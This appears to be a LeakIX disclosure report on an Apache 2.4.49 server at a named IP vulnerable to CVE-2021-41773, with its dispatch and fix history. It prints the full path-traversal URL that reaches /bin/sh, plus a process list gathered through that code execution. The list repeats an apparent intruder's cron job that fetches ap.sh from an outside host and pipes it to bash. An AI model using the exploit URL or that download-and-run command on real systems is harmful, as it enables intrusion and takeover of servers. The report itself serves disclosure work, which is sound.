• Creation
  • Validation
  • Communication & fix
  • Disclosure

Guard Alliance Security / Apache 2.4.49 vulnerable to CVE-2021-41773
BloodyShell reported 2021-10-07

Your server was found vulnerable to CVE-2021-41773.

With mod_cgi being installed- attackers are able to execute code on your server.

The CVE-2021-41773 prevention reports are identified and dispatched with the help of HaboubiAnis

IP:
91.134.17.100
Port:
80
Detected protocol:
http
Vulnerable URL:
http://91.134.17.100/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 
Found processes trough Apache RCE:

/usr/lib/systemd/systemd�--switched-root�--system�--deserialize�21�


sshd: unknown [priv]�
sshd: unknown [net]��

sshd: unknown [priv]�
sshd: unknown [net]��
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/sbin/dhclient�-1�-q�-lf�/var/lib/dhclient/dhclient--eth0.lease�-pf�/var/run/dhclient-eth0.pid�-h�panel�eth0�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/dovecot�-f�-c�/etc/dovecot/dovecot.conf�
/usr/bin/python2�-es�/usr/sbin/tuned�-l�-p�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

dovecot/anvil�
/usr/local/jetapps/usr/bin/mongod�--quiet�-f�/usr/local/jetapps/etc/mongod.conf�run�
dovecot/lmtp�
dovecot/auth�

/usr/sbin/sshd�-d�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�

/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/pdns_server�--guardian=no�--daemon=no�--disable-syslog�--log-timestamp=no�--write-pid=no�

cpsrvd (ssl) - waiting for connections                    
php-fpm: master process (/opt/cpanel/ea-php73/root/etc/php-fpm.conf)
/usr/sbin/rsyslogd�-n�
php-fpm: master process (/opt/cpanel/ea-php74/root/etc/php-fpm.conf)

/sbin/agetty�--noclear�tty1�linux�
/usr/sbin/crond�-n�
/usr/sbin/atd�-f�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/local/cpanel/3rdparty/perl/532/bin/perl�-t -w�/usr/local/cpanel/3rdparty/bin/spamd�--allowed-ips=127.0.0.1,::1�--max-children=5�--pidfile=/var/run/spamd.pid�--listen=5�--listen=6�


/usr/sbin/httpd�-k�start�


/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
dovecot/imap�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dovecot/imap�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/log�
dovecot/pop3-login�
dovecot/config�
dovecot/stats�
dovecot/imap-login�

/usr/sbin/mysqld�--daemonize�--pid-file=/var/run/mysqld/mysqld.pid�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
spamd child
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�
dovecot/imap�

dnsadmin - dormant mode
cpgreylistd - processor
tailwatchd
cphulkd - processor
cpdavd - accepting connections on: 2079, 2080, 2090, 2091, 2077, 2078 (dormant)
cpanellogd - sleeping for logs
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)�������������������������
sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)����������������������������������������������������������������������������������
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�background-tasks-executor.php�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�scheduled-tasks-executor.php�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
cphulkd - dbprocessor
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
spamd child

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dhclient�-4�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=panel.knothost.com�--suffix=-bytes_log�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=panel.knothost.com�--mainout=/etc/apache2/logs/access_log�
/usr/local/cpanel/3rdparty/bin/perl�/usr/local/cpanel/bin/leechprotect�


/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�






dovecot/lmtp�







dovecot/imap�
dovecot/imap�








































/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�








/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/lib/systemd/systemd-journald�


/usr/sbin/lvmetad�-f�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
/usr/sbin/httpd�-k�start�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�

/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/usr/lib/systemd/systemd-udevd�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�








php-fpm: pool yg-gaming_com������������������������������








/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/sbin/auditd�


/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�


dovecot/imap-hibernate�
/sbin/rpcbind�-w�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�

/usr/sbin/irqbalance�--foreground�
/usr/sbin/gssproxy�-d�
bash�

/usr/sbin/crond�-n�
/usr/sbin/crond�-n�

/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/lib/polkit-1/polkitd�--no-debug�
/usr/sbin/chronyd�
/usr/bin/dbus-daemon�--system�--address=systemd:�--nofork�--nopidfile�--systemd-activation�
queueprocd - waiting up to 60s to process a task
/sbin/mdadm�--monitor�--scan�-f�--pid-file=/var/run/mdadm/mdadm.pid�
/usr/sbin/smartd�-n�-q�never�
/usr/lib/systemd/systemd-logind�
/usr/sbin/exim�-ps�-bd�-q1h�-op�/var/spool/exim/exim-daemon.pid�
/usr/sbin/nscd�
/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�







cat�/proc/self/cmdline�
Found by Apache2449TraversalPlugin 2021-10-07
Report created by BloodyShell  2021-10-07
Report approved by deleted-user  2021-10-07
New PDF report generated by system 2021-10-07
Report dispatched to ...@... by system 2021-10-07
BloodyShell commented 2021-10-07: approved shows in report 

Bounced, mail doesn't exists.

New PDF report generated by system 2021-10-07
Report comment dispatched to Info@guardalliancesecurity.com by system 2021-10-07
system commented 2021-11-03: approved shows in report 

bip! I'm a LeakIX probe.

This issue looks like it has been resolved!

New PDF report generated by system 2021-11-03
Report comment dispatched to BloodyShell by system 2021-11-03
Report comment dispatched to Info@guardalliancesecurity.com by system 2021-11-03
Report marked as fixed by BloodyShell  2021-11-03
Report closed by BloodyShell  2021-11-03
New PDF report generated by system 2021-11-03
Information
Owner Guard Alliance Security
Created 2021-10-07 15:37
Updated 2021-11-03 18:32
Fixed true
Contacts
I...@guardalliancesecurity.com
Status
Status closed
Hosting contacted false
CERT contacted false
Download report

© 2024 LeakIX
About LeakIX - Credits - Take-down and blacklist requests - Security issues - Terms and conditions - Cookie policy - Legal notice